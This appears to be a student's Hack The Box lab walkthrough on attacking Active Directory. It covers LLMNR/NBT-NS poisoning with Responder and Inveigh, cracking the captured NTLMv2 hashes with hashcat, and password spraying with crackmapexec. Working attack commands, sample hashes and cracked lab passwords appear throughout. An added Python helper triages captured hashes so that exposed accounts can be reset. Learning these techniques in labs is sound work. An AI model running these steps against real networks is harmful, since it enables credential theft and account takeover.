LLMNR/NBT-NS & Spraying for AD Access

LLMNR/NBT-NS Poisoning with Responder (Linux)

Steps

mrci0x1@htb$ tmux new -s responder

Start Responder in Poisoning Mode

mrci0x1@htb$ sudo responder -I ens224 -wf
[+] Listening for events...
[+] Poisoning LLMNR, NBT-NS, MDNS
[+] WPAD rogue proxy server started
[+] Fingerprinting host OS/version

Monitor Captures

mrci0x1@htb$ ls /usr/share/responder/logs
Analyzer-Session.log                Responder-Session.log
Config-Responder.log                SMB-NTLMv2-SSP-172.16.5.200.txt
HTTP-NTLMv2-172.16.5.200.txt        SMB-NTLMv2-SSP-172.16.5.25.txt
Poisoners-Session.log               SMB-NTLMv2-SSP-172.16.5.50.txt
Proxy-Auth-NTLMv2-172.16.5.200.txt

View a captured hash

mrci0x1@htb$ cat /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.5.25.txt
FOREND::INLANEFREIGHT:4af70a79938ddf8a:0f85ad1e80baa52d732719dbf62c34cc:...

Crack Hashes with Hashcat

mrci0x1@htb$ cp /usr/share/responder/logs/SMB-NTLMv2-SSP-172.16.5.25.txt forend_ntlmv2.txt
mrci0x1@htb$ hashcat -m 5600 forend_ntlmv2.txt /usr/share/wordlists/rockyou.txt
mrci0x1@htb$ hashcat -m 5600 forend_ntlmv2.txt /usr/share/wordlists/rockyou.txt --show > cracked_forend.txt
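Added example, not part of the original notes and not Responder's or hashcat's own code: a Python triage helper for the hashcat mode 5600 line shape shown above (user::DOMAIN:server_challenge:NTProofStr:blob, with ":plaintext" appended by hashcat --show). From an incident-response view every account in such a file has had its NTLMv2 response captured and is offline-crackable, so the whole list needs a reset, and the cracked subset needs one immediately. The sample lines, their hex values and the svc_sql account are constructed; usernames are normalised so FOREND and forend (the case varies with how the client sent it) count as one account.

```python
import re
from typing import Iterable

# Assumed line shape (hashcat -m 5600 / Responder NTLMv2-SSP files):
#   user::DOMAIN:server_challenge(16 hex):NTProofStr(32 hex):blob(hex)[:plaintext]
# The trailing ":plaintext" is what `hashcat --show` appends for cracked entries.
NTLMV2_RE = re.compile(
    r"^(?P<user>[^:]+)::(?P<domain>[^:]*):"
    r"(?P<challenge>[0-9A-Fa-f]{16}):"
    r"(?P<proof>[0-9A-Fa-f]{32}):"
    r"(?P<blob>[0-9A-Fa-f]+)"
    r"(?::(?P<plain>.*))?$"
)


def parse_ntlmv2_line(line: str):
    """Return (account, cracked) for one 5600-format line, or None if malformed.

    The account is normalised to DOMAIN\\user so that FOREND and forend
    (same account, different client-side casing) collapse to one entry.
    """
    m = NTLMV2_RE.match(line.strip())
    if not m:
        return None
    account = f"{m['domain'].upper()}\\{m['user'].lower()}"
    return account, m["plain"] is not None


def triage_captures(lines: Iterable[str]) -> dict:
    """Build the reset list an IR team needs from a capture/crack file.

    'exposed'   : every account whose NTLMv2 response was captured (all crackable offline)
    'cracked'   : the subset hashcat --show already recovered a plaintext for
    'malformed' : non-empty lines that are not in the 5600 format (e.g. Responder status output)
    """
    exposed, cracked, malformed = set(), set(), 0
    for line in lines:
        if not line.strip():
            continue
        parsed = parse_ntlmv2_line(line)
        if parsed is None:
            malformed += 1
            continue
        account, was_cracked = parsed
        exposed.add(account)
        if was_cracked:
            cracked.add(account)
    return {"exposed": sorted(exposed), "cracked": sorted(cracked), "malformed": malformed}


# Constructed sample: challenges, NTProofStr values and blobs are made up and the
# blobs are shortened; nothing here is a real capture from any host.
SAMPLE_LINES = """\
FOREND::INLANEFREIGHT:4af70a79938ddf8a:0f85ad1e80baa52d732719dbf62c34cc:0101000000000000c0653150de09d201
forend::INLANEFREIGHT:4af70a79938ddf8a:0f85ad1e80baa52d732719dbf62c34cc:0101000000000000c0653150de09d201:Klmcargo2
backupagent::INLANEFREIGHT:B5013246091943D7:16A41B703C8D4F8F6AF75C47C3B50CB5:0101000000000000aabbccdd00112233
svc_sql::INLANEFREIGHT:0011223344556677:00112233445566778899aabbccddeeff:0101000000000000deadbeef
[+] Listening for events...
""".splitlines()

if __name__ == "__main__":
    result = triage_captures(SAMPLE_LINES)
    print("exposed (reset all):", ", ".join(result["exposed"]))
    print("cracked (reset now):", ", ".join(result["cracked"]))
    print("malformed lines skipped:", result["malformed"])
```

Feed it the concatenated Responder SMB-NTLMv2-SSP-*.txt files or the hashcat --show output; the malformed counter catches stray status lines without hiding them.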

LLMNR/NBT-NS Poisoning with Inveigh (PowerShell Version)

Prerequisites Check

PS C:\mrci0x1> netstat -ano | findstr ":80 :445 :389 :5355 :137"

Load Inveigh Module

PS C:\mrci0x1> Set-ExecutionPolicy -Scope CurrentUser -ExecutionPolicy Bypass
PS C:\mrci0x1> Import-Module C:\Tools\Inveigh.ps1
PS C:\mrci0x1> (Get-Command Invoke-Inveigh).Parameters
Key                     Value
---                     -----
ADIDNSHostsIgnore       System.Management.Automation.ParameterMetadata
KerberosHostHeader      System.Management.Automation.ParameterMetadata
ProxyIgnore             System.Management.Automation.ParameterMetadata
PcapTCP                 System.Management.Automation.ParameterMetadata
PcapUDP                 System.Management.Automation.ParameterMetadata
SpooferHostsReply       System.Management.Automation.ParameterMetadata
SpooferHostsIgnore      System.Management.Automation.ParameterMetadata
SpooferIPsReply         System.Management.Automation.ParameterMetadata

Start Inveigh Poisoning

PS C:\mrci0x1> Invoke-Inveigh -ConsoleOutput Y -LLMNR Y -NBNS Y -HTTP Y -FileOutput Y -FileOutputDirectory C:\Tools\Inveigh-Logs
[*] Inveigh 1.4 started...
[*] Listening for LLMNR/NBNS requests...
[+] LLMNR request for XYZ from 172.16.5.50
[+] Captured SMB NTLMv2 challenge/response from 172.16.5.50:
INLANEFREIGHT\jhermann:5b8e2c1a9f4d3e7b:1a2b3c4d5e6f7...

Check Logs

PS C:\mrci0x1> dir C:\Tools\Inveigh-Logs

-a----        6/21/2025  12:57 PM           1053 Inveigh_Log.txt
PS C:\mrci0x1> Copy-Item C:\Tools\Inveigh-Logs\Inveigh_Log.txt C:\Users\mrci0x1\Documents\

LLMNR/NBT-NS Poisoning with InveighZero (C# Version)

Launch Executable

PS C:\mrci0x1> .\Inveigh.exe
[*] Inveigh 2.0.4 [Started 2022-02-28T20:03:28 | PID 6276]
[+] Packet Sniffer Addresses [IP 172.16.5.25 ...]
[+] Listener Addresses [IP 0.0.0.0 ...]
[+] Spoofer Reply Addresses [IP 172.16.5.25 ...]
[+] LLMNR Packet Sniffer [Type A]
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[+] File Output [C:\Tools]

Interact with InveighZero

> GET NTLMV2UNIQUE
backupagent::INLANEFREIGHT:B5013246091943D7:16A41B703C8D4F8F6AF75C47C3B50CB5:...
forend::INLANEFREIGHT:32FD89BD78804B04:DFEB0C724F3ECE90E42BAF061B78BFE2:...
> GET NTLMV2USERNAMES
IP Address                       | Host                            | Username
172.16.5.125                     | ACADEMY-EA-FILE                 | INLANEFREIGHT\backupagent
172.16.5.125                     | ACADEMY-EA-FILE                 | INLANEFREIGHT\forend
172.16.5.125                     | ACADEMY-EA-FILE                 | INLANEFREIGHT\clusteragent
> STOP

Cracking Captured Hashes

PS C:\mrci0x1> hashcat.exe -m 5600 C:\Users\mrci0x1\Documents\ntlmv2_hashes.txt C:\Tools\wordlists\rockyou.txt --show | Out-File C:\Users\mrci0x1\Documents\cracked_hashes.txt
Linux equivalent (--show only prints entries already cracked into the potfile, so run the cracking pass without it first):
mrci0x1@htb$ hashcat -m 5600 ~/Documents/ntlmv2_hashes.txt /usr/share/wordlists/rockyou.txt --show > ~/Documents/cracked_hashes.txt
forend::INLANEFREIGHT:32FD89BD78804B04:DFEB0C724F3ECE90E42BAF061B78BFE2:...:Klmcargo2
backupagent::INLANEFREIGHT:B5013246091943D7:16A41B703C8D4F8F6AF75C47C3B50CB5:...:Backup2024!

Password Spraying (Post-Poisoning)

mrci0x1@htb$ echo -e "Klmcargo2\nFreight2023!\nIlovefishing!\nWinter2024!\nBackup2024!" > passwords.txt
mrci0x1@htb$ crackmapexec smb 172.16.5.0/24 -u valid_ad_users.txt -p passwords.txt
SMB 172.16.5.10 445 INLANEFREIGHT [+] INLANEFREIGHT\admin:Winter2024!
SMB 172.16.5.50 445 INLANEFREIGHT [+] INLANEFREIGHT\backupagent:Backup2024!
SMB 172.16.5.80 445 INLANEFREIGHT [+] INLANEFREIGHT\forend:Klmcargo2
